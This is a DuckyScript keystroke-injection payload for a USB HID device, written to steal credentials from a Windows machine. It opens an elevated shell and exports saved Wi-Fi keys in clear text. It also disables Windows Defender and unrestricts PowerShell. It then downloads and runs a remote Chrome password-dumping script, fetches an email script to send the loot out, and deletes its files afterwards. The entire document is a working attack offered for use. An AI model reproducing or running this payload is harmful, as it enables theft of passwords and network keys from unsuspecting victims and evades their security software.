REM let the HID enumerate
DELAY 1000
GUI r
DELAY 300
STRING cmd 
DELAY 350
CTRL-SHIFT ENTER
DELAY 2000
ALT y 
DELAY 500
STRING cd C:\
ENTER
DELAY 200
STRING md l 
ENTER
DELAY 200
REM ***  move into the new directory and export the wifi information  ***
STRING cd l && netsh wlan export profile key=clear >nul
ENTER
DELAY 1500
STRING powershell -WindowStyle hidden
ENTER
REM *** runing powershell through cmd with admin privlages, turn off windows defender, and set powerscript execution policy ***
DELAY 400
STRING Set-MpPreference -DisableRealtimeMonitoring $true
ENTER
DELAY 2000
STRING set-executionpolicy unrestricted
ENTER
DELAY 500
STRING Stop-Process -Name chrome
ENTER
DELAY 500
REM  *** dump passwords using a modified version of Empire Project's Get-ChromeDump.ps1 ***
STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/jcldf/digispark-chrome-password-exfiltrate/master/Get-ChromeDump.ps1'); Get-ChromeDump -OutFile 'C:\l\ChromeDump.txt'
ENTER
DELAY 20000
REM  *** time to send an email everything in C:\l ***
STRING IEX (New-Object Net.WebClient).DownloadString('EMAIL POWER SHELL CODE.ps1')
ENTER
DELAY 30000
STRING exit
ENTER
DELAY 250
STRING cd ..
ENTER 
DELAY 250
STRING del "C:\l\ChromeDump.txt"
ENTER
DELAY 250
STRING s
ENTER
DELAY 200
STRING rmdir "C:\l"
ENTER
DELAY 150
STRING exit
ENTER
